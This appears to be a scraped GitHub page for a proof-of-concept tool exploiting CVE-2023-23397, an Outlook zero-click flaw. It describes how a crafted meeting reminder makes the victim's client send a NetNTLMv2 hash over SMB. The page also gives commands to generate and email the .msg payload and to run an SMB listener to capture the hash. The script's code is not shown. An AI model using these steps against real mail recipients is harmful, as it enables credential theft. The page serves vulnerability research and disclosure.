CVE-2023-23397

Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.

Description

Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).

An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox.

What does the poc do?

Generated .msg payload.
Send it by email with custom SMTP server.

Usage

In one session :

python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

In a second session (smbserver or responder as you want).

smbserver.py -smb2support SHARE .

Demo (manual poc)

Explanatory video (french speaking)

Original article

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
CVE-2023-23397.py		CVE-2023-23397.py
README.md		README.md
poc.gif		poc.gif

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2023-23397.py

CVE-2023-23397.py

README.md

README.md

poc.gif

poc.gif

Repository files navigation

CVE-2023-23397

Description

What does the poc do?

Usage

Demo (manual poc)

Explanatory video (french speaking)

Original article

About

Releases

Packages

Languages

Trackflaw/CVE-2023-23397

Folders and files

Latest commit

History

Repository files navigation

CVE-2023-23397

Description

What does the poc do?

Usage

Demo (manual poc)

Explanatory video (french speaking)

Original article

About

Topics

Resources

Stars

Watchers

Forks

Languages